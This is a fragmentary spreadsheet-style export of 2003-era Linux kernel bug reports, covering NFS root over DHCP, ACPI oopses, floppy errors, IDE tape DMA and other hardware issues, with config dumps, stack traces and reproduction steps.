tuxie crond: crond shutdown succeeded Jul 28 01:08:13 tuxie identd: identd shutdown succeeded Jul 28 01:08:13 tuxie dd: 1+0 records in Jul 28 01:08:13 tuxie dd: 1+0 records out Jul 28 01:08:13 tuxie random: Saving random seed succeeded Jul 28 01:08:13 tuxie network: Shutting down interface eth0 succeeded Jul 28 01:08:13 tuxie sysctl: net.ipv4.ip_forward = 0 Jul 28 01:08:13 tuxie network: Disabling IPv4 packet forwarding succeeded Jul 28 01:08:13 tuxie kernel: Kernel logging (proc) stopped. Jul 28 01:08:13 tuxie kernel: Kernel log daemon terminating. Jul 28 01:08:14 tuxie syslog: klogd shutdown succeeded Jul 28 01:08:14 tuxie exiting on signal 15 ----- end of boot.log--- --- .config --- # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=15 # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set CONFIG_MPENTIUMIII=y # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_HUGETLB_PAGE=y CONFIG_SMP=y CONFIG_NR_CPUS=2 CONFIG_PREEMPT=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set CONFIG_MICROCODE=y CONFIG_X86_MSR=y CONFIG_X86_CPUID=y CONFIG_EDD=y # CONFIG_NOHIGHMEM is not set CONFIG_HIGHMEM4G=y # CONFIG_HIGHMEM64G is not set CONFIG_HIGHMEM=y CONFIG_HIGHPTE=y # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # CONFIG_PM=y CONFIG_SOFTWARE_SUSPEND=y # # ACPI Support # CONFIG_ACPI=y # CONFIG_ACPI_HT_ONLY is not set CONFIG_ACPI_BOOT=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y CONFIG_ACPI_AC=m CONFIG_ACPI_BATTERY=m CONFIG_ACPI_BUTTON=m CONFIG_ACPI_FAN=m CONFIG_ACPI_PROCESSOR=m CONFIG_ACPI_THERMAL=m # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set CONFIG_ACPI_DEBUG=y CONFIG_ACPI_BUS=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set CONFIG_APM_DO_ENABLE=y # CONFIG_APM_CPU_IDLE is not set CONFIG_APM_DISPLAY_BLANK=y CONFIG_APM_RTC_IS_GMT=y # CONFIG_APM_ALLOW_INTS is not set # CONFIG_APM_REAL_MODE_POWER_OFF is not set # # CPU Frequency scaling # CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_PROC_INTF=m CONFIG_CPU_FREQ_GOV_USERSPACE=m # CONFIG_CPU_FREQ_24_API is not set CONFIG_CPU_FREQ_TABLE=y # # CPUFreq processor drivers # CONFIG_X86_ACPI_CPUFREQ=m CONFIG_X86_ACPI_CPUFREQ_PROC_INTF=y # CONFIG_X86_POWERNOW_K6 is not set # CONFIG_X86_POWERNOW_K7 is not set # CONFIG_X86_GX_SUSPMOD is not set CONFIG_X86_SPEEDSTEP_ICH=m CONFIG_X86_SPEEDSTEP_CENTRINO=m CONFIG_X86_SPEEDSTEP_LIB=m # CONFIG_X86_P4_CLOCKMOD is not set # CONFIG_X86_LONGRUN is not set # CONFIG_X86_LONGHAUL is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y CONFIG_ISA=y # CONFIG_EISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set CONFIG_PCMCIA_PROBE=y # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Generic Driver Options # CONFIG_FW_LOADER=m # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=y CONFIG_PARPORT_PC=y CONFIG_PARPORT_PC_CML1=m # CONFIG_PARPORT_SERIAL is not set CONFIG_PARPORT_PC_FIFO=y CONFIG_PARPORT_PC_SUPERIO=y CONFIG_PARPORT_OTHER=y CONFIG_PARPORT_1284=y # # Plug and Play support # CONFIG_PNP=y CONFIG_PNP_NAMES=y # CONFIG_PNP_DEBUG is not set # # Protocols # CONFIG_ISAPNP=y CONFIG_PNPBIOS=y # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_BLK_DEV_XD is not set # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_CRYPTOLOOP=m CONFIG_BLK_DEV_NBD=m CONFIG_BLK_DEV_RAM=m CONFIG_BLK_DEV_RAM_SIZE=4096 CONFIG_BLK_DEV_INITRD=y CONFIG_LBD=y # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y # # IDE, ATA and ATAPI Block devices # CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_IDEDISK_STROKE=y CONFIG_BLK_DEV_IDECD=y CONFIG_BLK_DEV_IDEFLOPPY=m CONFIG_BLK_DEV_IDESCSI=m CONFIG_IDE_TASK_IOCTL=y CONFIG_IDE_TASKFILE_IO=y # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_BLK_DEV_GENERIC=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y CONFIG_IDEDMA_PCI_WIP=y CONFIG_IDEDMA_NEW_DRIVE_LISTINGS=y CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set CONFIG_BLK_DEV_PDC202XX_NEW=y CONFIG_PDC202XX_FORCE=y # CONFIG_BLK_DEV_RZ1000 is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_CHIPSETS is not set CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_PDC202XX=y CONFIG_BLK_DEV_IDE_M</t>
  </si>
  <si>
    <t>root nfs mountpoint via dhcp does not work</t>
  </si>
  <si>
    <t>2003-07-31 03:13 UTC</t>
  </si>
  <si>
    <t>Bernd Porr</t>
  </si>
  <si>
    <t>2004-12-03 06:49 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian woody Bunk Hardware Environment: pentium II Software Environment: Problem Description: The mount point for root provided by dhcp does not work. Steps to reproduce: Boot with a 2.6 kernel with root fs via nfs and autoconfig via DHCP. Grub: title Kernel network dhcp root (nd) kernel /clients/tftpboot/sauerkraut/bzImage root=/dev/nfs ip=dhcp # # title Krnl-2.6 network dhcp root (nd) kernel /clients/tftpboot/sauerkraut/bzImage-2.6 root=/dev/nfs ip=dhcp Log: with 2.6-test2: Jul 29 17:03:39 roulade rpc.mountd: bad path in mount request from 139.153.168.129: "139.153.168.134:/clients/root/sauerkraut" The same with 2.4.21: Jul 29 17:06:07 roulade rpc.mountd: authenticated mount request from sauerkraut.cn.stir.ac.uk:800 for /clients/root/sauerkraut (/clients/root/sauerkraut) Workaround: Give the root path to the boot loader: kernel /clients/tftpboot/sauerkraut/bzImage-2.6 root=/dev/nfs ip=dhcp nfsroot=/clients/root/sauerkraut It's not severe but it problably gives admins a nightshift to modify all the boot scripts... /Bernd</t>
  </si>
  <si>
    <t>2.6.0-test2-mm2</t>
  </si>
  <si>
    <t>acpi related oops and panic</t>
  </si>
  <si>
    <t>kernel-2.6.0-test2</t>
  </si>
  <si>
    <t>2003-08-01 11:42 UTC</t>
  </si>
  <si>
    <t>Matthew Galgoci</t>
  </si>
  <si>
    <t>2004-03-03 21:50 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat Linux rawhide Hardware Environment: IBM Thinkpad x30 with bios v1.05 Software Environment: Linux kernel 2.6.0-0.test2 Problem Description: I get the following Oops and panic when I press the ibm fn key: Unable to handle kernel paging request at virtual address 1a5a5a5a *pde = 00000000 Oops: 0002 [#1] CPU: 0 EIP: 0060:[&lt;c01af93b&gt;] Not tainted EFLAGS: 00010046 EIP is at acpi_os_write_memory+0x25/0x4a eax: 5a5a5a5a ebx: 0000004e ecx: 00000008 edx: 5a5a5a5a esi: 00000008 edi: 0000004e ebp: 00000246 esp: cf6b7c30 ds: 007b es: 007b ss: 0068 Process events/0 (pid: 3, threadinfo=cf6b6000 task=c127ec80) Stack: c13a5b8c c01ba945 5a5a5a5a 5a5a5a5a 0000004e 00000008 0000004e 0000004e 00000000 c13a5b68 c13a5b8c c01c5301 00000008 0000004e c13a5b8c 4e00004e 0000001f cf6b7d70 c13a5b68 cf68d234 cf690908 c01c5684 c13a5b68 0000004e Call Trace: [&lt;c01ba945&gt;] acpi_hw_low_level_write+0x48/0x9f [&lt;c01c5301&gt;] acpi_ec_read+0x8f/0xcc [&lt;c01c5684&gt;] acpi_ec_space_handler+0x57/0xa9 [&lt;c01c562d&gt;] acpi_ec_space_handler+0x0/0xa9 [&lt;c01b334d&gt;] acpi_ev_address_space_dispatch+0xd2/0x128 [&lt;c01b6907&gt;] acpi_ex_access_region+0x45/0x4d [&lt;c01b6a50&gt;] acpi_ex_field_datum_io+0x107/0x177 [&lt;c01b6ce1&gt;] acpi_ex_extract_from_field+0x84/0x24d [&lt;c01b5768&gt;] acpi_ex_read_data_from_field+0x110/0x142 [&lt;c01b9d98&gt;] acpi_ex_resolve_node_to_value+0xa8/0xd0 [&lt;c01b5edb&gt;] acpi_ex_resolve_to_value+0x3b/0x46 [&lt;c01b7f12&gt;] acpi_ex_resolve_operands+0x194/0x2de [&lt;c01b140d&gt;] acpi_ds_exec_end_op+0x91/0x228 [&lt;c01be121&gt;] acpi_ps_parse_loop+0x518/0x823 [&lt;c01afd4a&gt;] acpi_os_wait_semaphore+0x71/0xd3 [&lt;c01c356e&gt;] acpi_ut_acquire_mutex+0x5c/0x72 [&lt;c01afd4a&gt;] acpi_os_wait_semaphore+0x71/0xd3 [&lt;c01c356e&gt;] acpi_ut_acquire_mutex+0x5c/0x72 [&lt;c01c35eb&gt;] acpi_ut_release_mutex+0x67/0x6c [&lt;c01c2722&gt;] acpi_ut_acquire_from_cache+0x48/0xa2 [&lt;c01be47a&gt;] acpi_ps_parse_aml+0x4e/0x17c [&lt;c01bed29&gt;] acpi_psx_execute+0x155/0x1a0 [&lt;c01bc0c9&gt;] acpi_ns_execute_control_method+0x43/0x52 [&lt;c01bc062&gt;] acpi_ns_evaluate_by_handle+0x6f/0x93 [&lt;c01b49f7&gt;] acpi_ev_asynch_execute_gpe_method+0x56/0xb3 [&lt;c01afbca&gt;] acpi_os_execute_deferred+0xe/0x1b [&lt;c012a5e3&gt;] worker_thread+0x1a3/0x260 [&lt;c01afbbc&gt;] acpi_os_execute_deferred+0x0/0x1b [&lt;c01197a0&gt;] default_wake_function+0x0/0x30 [&lt;c010aae2&gt;] ret_from_fork+0x6/0x14 [&lt;c01197a0&gt;] default_wake_function+0x0/0x30 [&lt;c012a440&gt;] worker_thread+0x0/0x260 [&lt;c0108d05&gt;] kernel_thread_helper+0x5/0x10 Code: 88 98 00 00 00 c0 eb 19 66 89 98 00 00 00 c0 eb 10 89 98 00 Steps to reproduce: Boot kernel, press fn key. Reproducable 100% of the time.</t>
  </si>
  <si>
    <t>2.6.0-test2-mm1 and -mm2</t>
  </si>
  <si>
    <t>2003-08-01 12:54 UTC</t>
  </si>
  <si>
    <t>2003-08-11 09:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Woody Hardware Environment: 4-way PIII 700, 4GB ram Software Environment: LTP-20030710 Gnu C 3.2.3 Gnu make 3.80 util-linux 2.11z mount 2.11z module-init-tools 2.4.21 e2fsprogs 1.34-WIP PPP 2.4.1 nfs-utils 1.0.3 Linux C Library 2.3.1 Dynamic linker (ldd) 2.3.1 Procps 3.1.9 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.0 Problem Description: As of 2.6.0-test2-mm1, the ustat01 and ustat02 tests from LTP return FAIL, but they do not fail in 2.6.0-test2 unpatched. I'm guessing this is related to the 64bit dev_t patches? Is this something that glibc will have to fix or is it ok to work around it in sys_ustat? Steps to reproduce: run ustat01 or ustat02 from LTP</t>
  </si>
  <si>
    <t>Rafael J. Wysocki</t>
  </si>
  <si>
    <t>floppy: bad sectors trigger oops and other chaos</t>
  </si>
  <si>
    <t>2.6.0-test2-bk2</t>
  </si>
  <si>
    <t>2003-08-02 10:36 UTC</t>
  </si>
  <si>
    <t>2003-09-30 20:29 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake cooker Hardware Environment: x86, standard internal floppy drive Software Environment: kernel compiled with Debian gcc 3.3.1 prerelease, -Os; it also happens with gcc 2.95.3 and the default (-O2) compile option Problem Description: An attempt to read a floppy with a bad sector causes a kernel oops and a bunch of error messages every 3-4 seconds until the thing gives up. Afterward, keyboard input is basically ignored (it becomes impossible to switch virtual consoles or to type into them, although the num/caps/scroll lock lights still respond, and Magic SysRq still works). BTW, I think I've gotten the same "can't type into or switch between VCs but the lights still respond and I can still use Magic SysRq" problem (with no oops though) when some CD recording errors happen. I'm not completely sure if it's an error in CD recording that causes it (it has something to do with CD recording, anyway), and that scenario is nearly impossible to reproduce on demand. This floppy disk bug is quite easy to reproduce if you have a disk with a bad sector, though. Steps to reproduce: 1. Slide the write-protect tab on the floppy into the protected position. 2. Mount the floppy. 3. cat a file with a bad sector to /dev/null I will attach the oopses soon.</t>
  </si>
  <si>
    <t>Carlos D</t>
  </si>
  <si>
    <t>ACPI-0345 Error on IBM Thinkpad R40</t>
  </si>
  <si>
    <t>2.4.22-pre10</t>
  </si>
  <si>
    <t>2003-08-04 05:40 UTC</t>
  </si>
  <si>
    <t>Ruben Puettmann</t>
  </si>
  <si>
    <t>2004-03-03 21:51 UTC</t>
  </si>
  <si>
    <t>Shaohua</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: IBM Thinkpad R40 2722 with newest aviable BIOS Problem Description: ACPI-0345: *** Error: Handler for [EmbeddedControl] returned AE_TIME ACPI-1121: *** Error: Method execution failed [\_SB_.PCI0.LPC_.EC__.AC__._PSR] Node c15ba320), AE_TIME ACPI-0345: *** Error: Handler for [EmbeddedControl] returned AE_TIME ACPI-1121: *** Error: Method execution failed [\_SB_.PCI0.LPC_.EC__.BAT0._STA] (Node c15bbec0), AE_TIME ACPI-0345: *** Error: Handler for [EmbeddedControl] returned AE_TIME ACPI-1121: *** Error: Method execution failed [\_SB_.PCI0.LPC_.EC__.BAT1._STA] (Node c15ba220), AE_TIME ACPI: Power Button (FF) [PWRF] ACPI: Lid Switch [LID] ACPI: Sleep Button (CM) [SLPB] ACPI-0345: *** Error: Handler for [EmbeddedControl] returned AE_TIME ACPI-1121: *** Error: Method execution failed [\_PR_.CPU_._PPC] (Node c158d960), AE_TIME ACPI: Processor [CPU] (supports C1 C2 C3, 6 performance states, 8 throttling states) ACPI-0345: *** Error: Handler for [EmbeddedControl] returned AE_TIME ACPI-1121: *** Error: Method execution failed [\_TZ_.THM0._TMP] (Node c15b5920), AE_TIME The most directory's under /proc/acpi are empty.</t>
  </si>
  <si>
    <t>Kernel hangups when trying to enter S3 or S4</t>
  </si>
  <si>
    <t>2.6.0-test2-bk4</t>
  </si>
  <si>
    <t>2003-08-04 06:35 UTC</t>
  </si>
  <si>
    <t>harry_x</t>
  </si>
  <si>
    <t>2004-09-19 19:23 UTC</t>
  </si>
  <si>
    <t>Luming Yu</t>
  </si>
  <si>
    <t>Distribution: Debian Woody Hardware Environment: Acer 233FX, Intel 845GL chipset, Intel Mobile Celeron 2ghz Software Environment: gcc 3.2 (with P4 optimizations) Problem Description: Kernel hangs when trying to enter S3 or S4 ACPI state. It prints Stopping tass: and then it hangs. Steps to reproduce: echo 3 &gt;/proc/acpi/sleep</t>
  </si>
  <si>
    <t>2.6.0-test2-mm4</t>
  </si>
  <si>
    <t>help message for CONFIG_REISERFS_FS is outdated</t>
  </si>
  <si>
    <t>2.5.x 2.6.x</t>
  </si>
  <si>
    <t>2003-08-04 16:34 UTC</t>
  </si>
  <si>
    <t>Mike Frysinger</t>
  </si>
  <si>
    <t>2003-12-18 15:40 UTC</t>
  </si>
  <si>
    <t>the url's should not be pointing to www.reiserfs.org since that has been turned into an ad site ... change them over to namesys.com at least ;)</t>
  </si>
  <si>
    <t>STT20000A Tape drive dma blacklist</t>
  </si>
  <si>
    <t>2003-08-05 00:55 UTC</t>
  </si>
  <si>
    <t>Andrew Lunn</t>
  </si>
  <si>
    <t>2007-06-02 15:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Woody Hardware Environment: Software Environment: Problem Description: I have a seagate STT20000A IDE tape drive which im using with an SiS IDE controller. The defaults for SiS is for every IDE device to use DMA. This causes my tape drive a problem because its DMA is broken. I talked to Seagate and they confirm that the device will only work reliably in PIO mode. Here is a patch to add this device to the IDE black list.</t>
  </si>
  <si>
    <t>pty slaves not appearing in devfs tree</t>
  </si>
  <si>
    <t>2003-08-05 01:09 UTC</t>
  </si>
  <si>
    <t>2003-10-31 04:54 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: The pty slave devices do not appear in devfs. They should be /dev/pts/s* and symbolic links from /dev/pty* into /dev/pts/s*. The problem is in the pty.c driver. The flag TTY_DRIVER_NO_DEVFS is set so that when the the slaves are initialises, they don't register themselves with the devfs. Programs that try to use pty then get into problems, eg ripperx, uses a pty to control cdparanoia and complains it cannot find a free pty. Attached is a patch to correct this. Its been sent to the devfs maintainer once but i never got a reply....</t>
  </si>
  <si>
    <t>Framebuffer doesn't work</t>
  </si>
  <si>
    <t>2003-08-06 11:19 UTC</t>
  </si>
  <si>
    <t>Jean-Michel Kelbert</t>
  </si>
  <si>
    <t>2003-08-31 14:07 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable with kernel 2.6.0 test2 Hardware Environment: Nvidia Geforce 4 on Dell Inspiron 8200 Software Environment: Problem Description: When trying to use framebuffering, I have a console screen with in made of my laptop logo (The Dell logo on a blue background) in reverse video. Steps to reproduce: Use vesafb on a Dell Inspiron 8200</t>
  </si>
  <si>
    <t>2.6.0-test3</t>
  </si>
  <si>
    <t>oops performing AIO write with O_DIRECT to block device</t>
  </si>
  <si>
    <t>2003-08-07 12:17 UTC</t>
  </si>
  <si>
    <t>2003-11-26 17:07 UTC</t>
  </si>
  <si>
    <t>Distribution:SLES8 Hardware Environment: 8way PIII 700Mhz, 4xServRAID with 80 9GB disks (20 RAID0 arrays) Software Environment: Problem Description: Doing multithreaded AIO to multiple drives produces the following oops 08/04/03-18:26:32 processing command: run seqaiowrite-O_DIR rawio -m 20 -p 160 -d 6 -n 102400 -x -z -t 13 -s 1024 new log requested 08/04/03-18:26:32 Running command rawio -m 20 -p 160 -d 6 -n 102400 -x -z -t 13 -s 1024 Oops: 0000 [#1] SMP CPU: 2 EIP: 0060:[&lt;c0307a9e&gt;] Not tainted VLI EFLAGS: 00010086 EIP is at as_move_to_dispatch+0xe/0x130 eax: 00000000 ebx: f7a8b0a0 ecx: 00000000 edx: fffffff9 esi: 00000000 edi: 00000000 ebp: 00000001 esp: f5bf1c78 ds: 007b es: 007b ss: 0068 Process rawread (pid: 24164, threadinfo=f5bf0000 task=f5e90690) Stack: 00000001 f59e2e40 f7a4ec00 00000000 f7a8b0a0 00000000 00000000 c0307cf5 f7a8b0a0 00000000 c036727d f7a8b0a0 00000000 f79e1a00 f7a4ec00 c0307e68 f7a8b0a0 f657d200 f79e1a00 c02ff626 f79e1a00 f657d200 f79e0800 f657d200 Call Trace: [&lt;c0307cf5&gt;] as_dispatch_request+0x135/0x270 [&lt;c036727d&gt;] ips_queue+0xdd/0x170 [&lt;c0307e68&gt;] as_next_request+0x38/0x50 [&lt;c02ff626&gt;] elv_next_request+0x16/0x100 [&lt;c03432e8&gt;] scsi_request_fn+0x38/0x2c0 [&lt;c0301467&gt;] generic_unplug_device+0x67/0x70 [&lt;c03015c6&gt;] blk_run_queues+0x86/0xa0 [&lt;c017c73d&gt;] direct_io_worker+0x28d/0x3f0 [&lt;c033e9b5&gt;] scsi_finish_command+0x75/0xb0 [&lt;c017c9f2&gt;] blockdev_direct_IO+0x152/0x162 [&lt;c0160470&gt;] blkdev_get_blocks+0x0/0x80 [&lt;c0160556&gt;] blkdev_direct_IO+0x66/0x70 [&lt;c0160470&gt;] blkdev_get_blocks+0x0/0x80 [&lt;c013d06d&gt;] generic_file_direct_IO+0x9d/0xc0 [&lt;c013c8d6&gt;] generic_file_aio_write_nolock+0x886/0xb30 [&lt;c010ba3e&gt;] apic_timer_interrupt+0x1a/0x20 [&lt;c011d3ec&gt;] schedule+0x2dc/0x5f0 [&lt;c0161606&gt;] blkdev_file_aio_write+0x36/0x40 [&lt;c017e370&gt;] aio_pwrite+0x40/0xc0 [&lt;c017e330&gt;] aio_pwrite+0x0/0xc0 [&lt;c017d84a&gt;] aio_run_iocb+0x8a/0x180 [&lt;c017e79d&gt;] io_submit_one+0x1bd/0x220 [&lt;c017e8bc&gt;] sys_io_submit+0xbc/0x140 [&lt;c010b04f&gt;] syscall_call+0x7/0xb Code: 01 00 00 00 a1 00 8c 48 c0 83 ea 28 39 42 30 0f 49 fe eb b0 90 90 8d b4 26 00 00 00 00 57 56 53 83 ec 10 8b 74 24 24 8b 5c 24 20 &lt;8b&gt; 7e 34 83 7e 04 02 0f 84 04 01 00 00 89 1c 24 e8 bd f5 ff ff Steps to reproduce: Benchmark can be obtained from: http://www-124.ibm.com/developerworks/opensource/linuxperf/rawread/rawread.html rawread -m 20 -p 160 -d 6 -n 102400 -x -z -t 13 -s 1024 This invocation runs on 20 logical disks starting at /dev/sdf. This test does not fail when run against only 1 disk. Have not tried binary search to see how many disks it takes to cause the failure.</t>
  </si>
  <si>
    <t>Lock-up during CD Audio Extraction via ide-scsi and grip</t>
  </si>
  <si>
    <t>2003-08-07 16:47 UTC</t>
  </si>
  <si>
    <t>Steve Fosdick</t>
  </si>
  <si>
    <t>2005-11-18 16:28 UTC</t>
  </si>
  <si>
    <t>Willem Riede</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Sharp PC-GP1415 - Athlon XP, VIA Chipset, 256Mb RAM. CDROM is: 'MATSHITA' 'UJDA720 DVD/CDRW' '1.00' Removable CD-ROM Output of lspci -vvv follows: 0:00.0 Host bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133] (rev 80) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR+ Latency: 8 Region 0: Memory at a0000000 (32-bit, prefetchable) [size=64M] Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:01.0 PCI bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133 AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR+ Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000c000-0000dfff Memory behind bridge: e0000000-efffffff Prefetchable memory behind bridge: 90000000-9fffffff BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:08.0 CardBus bridge: Texas Instruments PCI1420 Subsystem: Sharp corporation: Unknown device 1022 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 192, cache line size 08 Interrupt: pin A routed to IRQ 11 Region 0: Memory at 10000000 (32-bit, non-prefetchable) [size=4K] Bus: primary=00, secondary=02, subordinate=05, sec-latency=176 Memory window 0: 00000000-00000000 (prefetchable) Memory window 1: 00000000-00000000 (prefetchable) I/O window 0: 00000000-00000003 I/O window 1: 00000000-00000003 BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite- 16-bit legacy interface ports at 0001 00:08.1 CardBus bridge: Texas Instruments PCI1420 Subsystem: Sharp corporation: Unknown device 1022 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- 